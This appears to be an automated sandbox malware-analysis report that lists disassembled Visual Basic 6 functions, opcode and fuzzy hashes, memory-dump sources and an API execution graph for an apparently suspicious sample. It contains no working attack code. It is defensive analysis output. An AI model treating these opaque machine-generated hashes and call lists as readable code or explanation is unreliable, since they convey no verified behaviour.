                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Destruct$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1594393734-0
                                                                                                                                                            • Opcode ID: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                            • Instruction ID: 1c4b0c633f18c9e3bddb3555aaad557ebaf8a4bf2d76904fda437b0bccd5ade5
                                                                                                                                                            • Opcode Fuzzy Hash: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
                                                                                                                                                            • Instruction Fuzzy Hash: 00E050B2D58218AAE744D7D0ED45FED7B3CEB84701F004116FA46AA0D89AA02A45CBB5
                                                                                                                                                            Function 0041887E Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0041887E
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004188CD), ref: 004188A2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188AA
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188B2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188BA
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188C2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188CA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Destruct$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1594393734-0
                                                                                                                                                            • Opcode ID: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                            • Instruction ID: 7559dc89658ccc2b58e0618bd5d3b53ed62fe53bb83953d9ec1d7c87f6bb5db1
                                                                                                                                                            • Opcode Fuzzy Hash: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
                                                                                                                                                            • Instruction Fuzzy Hash: 0AE050B2D44118AAEB44D7D0ED45FFD7B3CEB84701F04411AFB46AA0D8DAA42A45CFA5
                                                                                                                                                            Function 00410080 Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0041009E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000,6CEBD8B1,6CEBDF85,00000000,004025E6), ref: 004100CE
                                                                                                                                                              • Part of subcall function 00410C70: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                              • Part of subcall function 00410C70: __vbaOnError.MSVBVM60(000000FF,00000000,6CEBD8B1,6CEBDF85,00000000,004025E6), ref: 00410CBE
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000), ref: 004100FC
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041011C
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 00410139
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410155
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1207130036-0
                                                                                                                                                            • Opcode ID: 885c88b7c4a7b9d42de6fe011f4235768c88f6b92c19c0712b662b2dd21f9fb8
                                                                                                                                                            • Instruction ID: 7b377bd5de676e89d855d9e41b3201db1aa312fdf1275dcf7b41b08b02665fd4
                                                                                                                                                            • Opcode Fuzzy Hash: 885c88b7c4a7b9d42de6fe011f4235768c88f6b92c19c0712b662b2dd21f9fb8
                                                                                                                                                            • Instruction Fuzzy Hash: 172107B5900348EBDB00DFE5DA49BDEBBB4FF48714F10812AE504B7290D7796A44CBA8
                                                                                                                                                            Function 0040E780 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7BF
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7CD
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7D8
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7F8
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E801
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E807
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CastCheckErrorExitFreeHresultProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2075080343-0
                                                                                                                                                            • Opcode ID: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
                                                                                                                                                            • Instruction ID: 3bf4f8c77da95384cc45dd6dff3f381c91b1124e7f22c247587acc69ccce5f1d
                                                                                                                                                            • Opcode Fuzzy Hash: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
                                                                                                                                                            • Instruction Fuzzy Hash: A1015B71940214ABCB00AFA5CE49EAABBB8FF48700F10456AF945B32A1C77854418EA9
                                                                                                                                                            Function 00419674 Relevance: 9.0, APIs: 6, Instructions: 19COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00419681
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041968B
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$CloseFile$ExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2014117853-0
                                                                                                                                                            • Opcode ID: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
                                                                                                                                                            • Instruction ID: dfea4ae46e95b786737fd6ac62915e102b9398e5dcf88c16ee641d2aebd4778e
                                                                                                                                                            • Opcode Fuzzy Hash: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
                                                                                                                                                            • Instruction Fuzzy Hash: 12E01276821128AACB04EBA0FD206DC3BB8FB08310B118026E846B3174DB742D84CFA8
                                                                                                                                                            Function 00418980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,x$@,?,?,?,?,?,00000000,004025E6), ref: 004189B6
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 004189E7
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418A02
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$ExitOverflowProc
                                                                                                                                                            • String ID: XuA$x$@
                                                                                                                                                            • API String ID: 3328922952-1101804690
                                                                                                                                                            • Opcode ID: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
                                                                                                                                                            • Instruction ID: f41aac51504d4341bf14d78ed7085f01873fde132ca3eda0e8d0e8435c4d1104
                                                                                                                                                            • Opcode Fuzzy Hash: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
                                                                                                                                                            • Instruction Fuzzy Hash: 310180B5D00254AFC710DF989A056DDFBB4EB08B50F10426BE805A3350C77458408BEA
                                                                                                                                                            Function 0040E250 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E295
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E2BA
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071CC,00000094), ref: 0040E2E4
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F3
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorExitFreeProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4045702744-0
                                                                                                                                                            • Opcode ID: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
                                                                                                                                                            • Instruction ID: b42082684cfda9da04a5b7e5b2bad02e9e7a05c797a4a6675c2a700778014143
                                                                                                                                                            • Opcode Fuzzy Hash: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
                                                                                                                                                            • Instruction Fuzzy Hash: 87114A74900214ABCB00DFA6CD48EDEBFF8FF98700F24456AF445B72A0C77859418AA9

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:6.6%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:15.5%
                                                                                                                                                            Total number of Nodes:796
                                                                                                                                                            Total number of Limit Nodes:39
                                                                                                                                                            execution_graph 36266 9098f0 36271 90adaf 36266->36271 36268 9098fa 36269 909904 36268->36269 36275 909920 UnhandledExceptionFilter 36268->36275 36272 90add6 36271->36272 36276 8ffbbc 36272->36276 36274 90adff 36274->36268 36275->36269 36277 8ffbc4 36276->36277 36278 8ffbc5 36276->36278 36277->36274 36281 8ffbca UnhandledExceptionFilter 36278->36281 36280 8ffcea 36280->36274 36281->36280 36282 90abf0 36283 90abfb 36282->36283 36285 90ac20 36283->36285 36286 90af0a 36283->36286 36287 90af31 36286->36287 36288 8ffbbc CatchGuardHandler UnhandledExceptionFilter 36287->36288 36289 90af66 36288->36289 36289->36283 36290 8f0888 36292 8f0894 36290->36292 36291 8f0c94 GetFileAttributesW 36291->36292 36292->36291 36293 8f0cac _swprintf 36292->36293 36294 907f58 36297 907cd5 36294->36297 36298 907ce1 _unexpected 36297->36298 36302 907cf9 36298->36302 36322 907e73 36298->36322 36299 907d9f 36303 907de8 36299->36303 36304 907dbc 36299->36304 36301 907d76 36305 907d8e 36301->36305 36327 908a91 UnhandledExceptionFilter CatchGuardHandler 36301->36327 36302->36299 36302->36301 36326 9087e0 UnhandledExceptionFilter RtlFreeHeap 36302->36326 36329 912390 UnhandledExceptionFilter CatchGuardHandler 36303->36329 36313 907dee 36304->36313 36328 908a91 UnhandledExceptionFilter CatchGuardHandler 36305->36328 36330 90b076 36313->36330 36316 907dfc GetPEB 36319 907e0c 36316->36319 36317 907e73 UnhandledExceptionFilter 36318 907e24 36317->36318 36334 49366f7 RtlExitUserProcess 36318->36334 36319->36317 36324 907e99 36322->36324 36323 8ffbbc CatchGuardHandler UnhandledExceptionFilter 36325 907ed9 36323->36325 36324->36323 36325->36302 36326->36301 36327->36305 36328->36299 36331 90b091 36330->36331 36332 8ffbbc CatchGuardHandler UnhandledExceptionFilter 36331->36332 36333 907df8 36332->36333 36333->36316 36333->36319 36335 907e2e 36334->36335 36336 90ab78 36337 90ab8b 36336->36337 36340 90a95b 36337->36340 36341 90a976 36340->36341 36342 90ab50 36341->36342 36347 90a9e7 36341->36347 36368 908e06 36341->36368 36343 8ffbbc CatchGuardHandler UnhandledExceptionFilter 36342->36343 36344 90ab63 36343->36344 36346 90aa9c 36373 90abc3 RtlFreeHeap _free 36346->36373 36347->36346 36362 90af6c 36347->36362 36351 90aa73 36351->36346 36354 90af6c UnhandledExceptionFilter 36351->36354 36352 90aaab 36353 908e06 UnhandledExceptionFilter 36352->36353 36356 90aacc 36352->36356 36353->36356 36354->36346 36355 90ab41 36372 90abc3 RtlFreeHeap _free 36355->36372 36356->36355 36357 90af6c UnhandledExceptionFilter 36356->36357 36359 90ab20 36357->36359 36359->36355 36360 90ab6f 36359->36360 36374 90abc3 RtlFreeHeap _free 36360->36374 36363 90af93 36362->36363 36365 90af9c 36363->36365 36375 90aff4 UnhandledExceptionFilter CatchGuardHandler 36363->36375 36366 8ffbbc CatchGuardHandler UnhandledExceptionFilter 36365->36366 36367 90aa60 36366->36367 36367->36346 36367->36351 36367->36352 36369 908e42 36368->36369 36370 908e14 36368->36370 36369->36347 36370->36369 36376 907a5e UnhandledExceptionFilter CatchGuardHandler 36370->36376 36372->36346 36373->36342 36374->36346 36375->36365 36376->36370 36377 9097fb 36387 90ae5b 36377->36387 36379 909850 36380 909801 36380->36379 36391 908dcc 36380->36391 36382 909821 36383 90ae5b UnhandledExceptionFilter 36382->36383 36384 909888 36382->36384 36383->36384 36385 908dcc _free RtlFreeHeap 36384->36385 36386 9098a8 36385->36386 36388 90ae82 36387->36388 36389 8ffbbc CatchGuardHandler UnhandledExceptionFilter 36388->36389 36390 90aeab 36389->36390 36390->36380 36392 908dd7 RtlFreeHeap 36391->36392 36393 908dec __dosmaperr 36391->36393 36392->36393 36393->36382 36394 8fdec2 36395 8fdecf _swprintf 36394->36395 36396 8fdef1 SetDlgItemTextW 36395->36396 36399 8fb568 PeekMessageW 36396->36399 36400 8fb5bc 36399->36400 36401 8fb583 GetMessageW 36399->36401 36402 8fb599 IsDialogMessageW 36401->36402 36403 8fb5a8 TranslateMessage DispatchMessageW 36401->36403 36402->36400 36402->36403 36403->36400 36404 8ff462 36405 8ff470 ___scrt_is_nonwritable_in_current_image 36404->36405 36412 8fdf1e 36405->36412 36407 8ff4aa 36408 8ff4be 36407->36408 36435 907efb UnhandledExceptionFilter GetPEB RtlFreeHeap RtlExitUserProcess 36407->36435 36436 8ff048 UnhandledExceptionFilter ___scrt_uninitialize_crt 36408->36436 36411 8ff4c6 36413 8fdf2e 36412->36413 36437 8fac16 36413->36437 36415 8fdf46 __cftof 36417 8fdf6e _swprintf __InternalCxxFrameHandler 36415->36417 36467 8fc5c4 CharUpperW 36415->36467 36418 8fe067 LoadIconW 36417->36418 36442 8fb6dd LoadBitmapW 36418->36442 36420 8fe088 36461 8f90b7 36420->36461 36423 8f90b7 UnhandledExceptionFilter 36424 8fe0aa DialogBoxParamW 36423->36424 36425 8fe0e4 36424->36425 36427 8fe10b 36425->36427 36468 8fae2f SetCurrentDirectoryW __cftof _wcslen 36425->36468 36428 8fe12a DeleteObject 36427->36428 36429 8fe13f DeleteObject 36428->36429 36430 8fe146 36428->36430 36429->36430 36431 8fe17d 36430->36431 36469 8fdc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 36430->36469 36464 8fac7c 36431->36464 36434 8fe1c3 36434->36407 36435->36408 36436->36411 36470 8f081b 36437->36470 36439 8fac2a OleInitialize 36440 8fac4d 36439->36440 36441 8fac6b SHGetMalloc 36440->36441 36441->36415 36443 8fb6fe 36442->36443 36444 8fb70b GetObjectW 36442->36444 36477 8fa6c2 36443->36477 36449 8fb71a 36444->36449 36447 8fb705 36447->36444 36447->36449 36472 8fa5c6 36449->36472 36450 8fb770 36450->36420 36451 8fb74c 36483 8fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 36451->36483 36452 8fa6c2 2 API calls 36454 8fb73d 36452->36454 36454->36451 36456 8fb743 DeleteObject 36454->36456 36455 8fb754 36484 8fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 36455->36484 36456->36451 36458 8fb75d 36485 8fa80c 8 API calls 36458->36485 36460 8fb764 DeleteObject 36460->36450 36490 8feb38 36461->36490 36463 8f90d6 36463->36423 36465 8facab 36464->36465 36466 8facb5 CoUninitialize 36465->36466 36466->36434 36467->36417 36468->36427 36469->36431 36471 8f0828 36470->36471 36471->36439 36486 8fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 36472->36486 36474 8fa5cd 36475 8fa5d9 36474->36475 36487 8fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 36474->36487 36475->36450 36475->36451 36475->36452 36478 8fa6db __InternalCxxFrameHandler 36477->36478 36479 8fa754 CreateStreamOnHGlobal 36478->36479 36482 8fa776 36478->36482 36480 8fa76c 36479->36480 36479->36482 36488 8fa626 735A6BB0 36480->36488 36482->36447 36483->36455 36484->36458 36485->36460 36486->36474 36487->36475 36489 8fa638 36488->36489 36489->36482 36491 8feb3d ___std_exception_copy 36490->36491 36493 8feb57 _com_raise_error 36491->36493 36494 907a5e UnhandledExceptionFilter CatchGuardHandler 36491->36494 36493->36463 36494->36491 36495 8edd80 36502 8edd8e _wcslen ___vcrt_InitializeCriticalSectionEx 36495->36502 36497 8ee159 36513 907625 36497->36513 36498 8ee1c6 36521 8ee27c 36498->36521 36500 907625 2 API calls 36500->36502 36501 8ee27c UnhandledExceptionFilter 36501->36502 36502->36497 36502->36500 36502->36501 36543 8ee5b1 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter __vsnprintf 36502->36543 36503 8ee1de 36504 8ee214 36503->36504 36506 8ee261 UnhandledExceptionFilter 36503->36506 36524 906310 36504->36524 36506->36503 36507 8ee22d 36508 906310 2 API calls 36507->36508 36510 8ee23f 36508->36510 36536 8e959a 36510->36536 36514 907630 36513->36514 36515 907634 ___std_exception_copy 36513->36515 36514->36498 36516 907660 36515->36516 36544 90a8be UnhandledExceptionFilter UnhandledExceptionFilter __cftof 36515->36544 36516->36498 36518 90766e 36518->36516 36545 909097 UnhandledExceptionFilter UnhandledExceptionFilter __cftof 36518->36545 36520 907685 36546 8ed57c 36521->36546 36523 8ee287 36523->36503 36525 906349 36524->36525 36526 90634d 36525->36526 36535 906375 36525->36535 36554 909087 UnhandledExceptionFilter UnhandledExceptionFilter __cftof 36526->36554 36527 906699 36529 8ffbbc CatchGuardHandler UnhandledExceptionFilter 36527->36529 36531 9066a6 36529->36531 36530 90635d 36532 8ffbbc CatchGuardHandler UnhandledExceptionFilter 36530->36532 36531->36507 36533 906369 36532->36533 36533->36507 36535->36527 36555 906230 UnhandledExceptionFilter CatchGuardHandler 36535->36555 36537 8e95be 36536->36537 36542 8e95cf 36536->36542 36538 8e95ca 36537->36538 36539 8e95d1 36537->36539 36537->36542 36556 8e974e 36538->36556 36561 8e9620 36539->36561 36543->36502 36544->36518 36545->36520 36547 8ed592 36546->36547 36549 8ed5da __InternalCxxFrameHandler ___std_exception_copy 36546->36549 36547->36549 36550 903e3e 36547->36550 36549->36523 36551 908e54 36550->36551 36552 908e06 UnhandledExceptionFilter 36551->36552 36553 908e69 36552->36553 36553->36549 36554->36530 36555->36535 36557 8e9757 36556->36557 36558 8e9781 36556->36558 36557->36558 36565 8ea1e0 36557->36565 36558->36542 36560 8e977f 36560->36542 36562 8e962c 36561->36562 36563 8e964a 36561->36563 36562->36563 36564 8e9638 CloseHandle 36562->36564 36563->36542 36564->36563 36569 8fec50 36565->36569 36568 8ea200 36568->36560 36570 8ea1ed DeleteFileW 36569->36570 36570->36568 36571 8fb7e0 36572 8fb7ea __EH_prolog 36571->36572 36687 8e1316 36572->36687 36575 8fbf0f 36729 8fd69e 36575->36729 36576 8fb82a 36578 8fb89b 36576->36578 36579 8fb838 36576->36579 36664 8fb841 _swprintf _wcslen 36576->36664 36584 8fb92e GetDlgItemTextW 36578->36584 36585 8fb8b1 36578->36585 36581 8fb878 36579->36581 36596 8fb83c 36579->36596 36589 8fb95f KiUserCallbackDispatcher 36581->36589 36581->36664 36582 8fbf2a SendMessageW 36583 8fbf38 36582->36583 36587 8fbf52 GetDlgItem SendMessageW 36583->36587 36588 8fbf41 SendDlgItemMessageW 36583->36588 36584->36581 36586 8fb96b 36584->36586 36595 8fb8ce SetDlgItemTextW 36585->36595 36591 8fb974 36586->36591 36592 8fb980 GetDlgItem 36586->36592 36746 8fa64d 36587->36746 36588->36587 36589->36664 36591->36581 36603 8fbe55 36591->36603 36593 8fb9b7 SetFocus 36592->36593 36594 8fb994 SendMessageW SendMessageW 36592->36594 36600 8fb9c7 36593->36600 36615 8fb9e0 _swprintf 36593->36615 36594->36593 36601 8fb8d9 36595->36601 36596->36664 36767 8e124f SHGetMalloc 36596->36767 36598 8fbf9f 36599 8fbfa5 SetWindowTextW 36598->36599 36748 8fabab GetClassNameW 36599->36748 36768 8fd4d4 36600->36768 36606 8fb8e6 GetMessageW 36601->36606 36601->36664 36607 8fbe65 SetDlgItemTextW 36603->36607 36609 8fb8fd IsDialogMessageW 36606->36609 36606->36664 36607->36664 36609->36601 36613 8fb90c TranslateMessage DispatchMessageW 36609->36613 36611 8fc1fc SetDlgItemTextW 36611->36664 36613->36601 36614 8fbff0 36619 8fc020 36614->36619 36624 8fc003 SetDlgItemTextW 36614->36624 36621 8fd4d4 16 API calls 36615->36621 36616 8fb9d9 36697 8ea0b1 36616->36697 36618 8fc73f 8 API calls 36618->36614 36622 8fc73f 8 API calls 36619->36622 36646 8fc0d8 36619->36646 36621->36616 36625 8fc03b 36622->36625 36623 8fc18b 36626 8fc19d 36623->36626 36627 8fc194 EnableWindow 36623->36627 36629 8ee617 36624->36629 36632 8fc04d 36625->36632 36648 8fc072 36625->36648 36630 8fc1ba 36626->36630 36784 8e12d3 GetDlgItem EnableWindow 36626->36784 36627->36626 36631 8fc017 SetDlgItemTextW 36629->36631 36639 8fb862 36630->36639 36642 8fc1d9 SendMessageW 36630->36642 36631->36619 36782 8f9ed5 7 API calls 36632->36782 36633 8fc0cb 36638 8fc73f 8 API calls 36633->36638 36635 8fbb11 36643 8fbd56 36635->36643 36670 8fbb20 _swprintf 36635->36670 36637 8fc1b0 36785 8e12d3 GetDlgItem EnableWindow 36637->36785 36638->36646 36639->36611 36639->36664 36640 8fc066 36640->36648 36642->36639 36708 8e12f1 GetDlgItem ShowWindow 36643->36708 36644 8fc169 36783 8f9ed5 7 API calls 36644->36783 36646->36623 36646->36644 36648->36633 36651 8fc73f 8 API calls 36648->36651 36649 8fbd66 36709 8e12f1 GetDlgItem ShowWindow 36649->36709 36650 8fc188 36650->36623 36654 8fc0a0 36651->36654 36653 8fba87 _swprintf 36653->36635 36653->36670 36704 8e966e 36653->36704 36654->36633 36656 8fc0a9 DialogBoxParamW 36654->36656 36655 8fbd70 36657 8fbd7a SetDlgItemTextW 36655->36657 36656->36581 36656->36633 36710 8e12f1 GetDlgItem ShowWindow 36657->36710 36660 8fbaed 36665 8e959a 2 API calls 36660->36665 36661 8fbd8c SetDlgItemTextW GetDlgItem 36662 8fbda9 GetWindowLongW SetWindowLongW 36661->36662 36663 8fbdc1 36661->36663 36662->36663 36711 8fc73f 36663->36711 36665->36635 36668 8fbc6b ShellExecuteExW 36684 8fbc88 36668->36684 36669 8fc73f 8 API calls 36671 8fbddd 36669->36671 36670->36581 36670->36664 36672 8fbbf4 36670->36672 36686 8fbc28 __InternalCxxFrameHandler 36670->36686 36719 8fda52 36671->36719 36778 8fb425 SHGetMalloc 36672->36778 36675 8fbdee 36677 8fc73f 8 API calls 36675->36677 36676 8fbc10 36779 8fb425 SHGetMalloc 36676->36779 36683 8fbe03 36677->36683 36679 8fbc1c 36780 8fb425 SHGetMalloc 36679->36780 36680 8fbe2c 36781 8e12d3 GetDlgItem EnableWindow 36680->36781 36683->36680 36685 8fc73f 8 API calls 36683->36685 36684->36581 36685->36680 36686->36668 36688 8e1378 36687->36688 36689 8e131f 36687->36689 36787 8ee2c1 GetWindowLongW SetWindowLongW 36688->36787 36690 8e1385 36689->36690 36786 8ee2e8 10 API calls 2 library calls 36689->36786 36690->36575 36690->36576 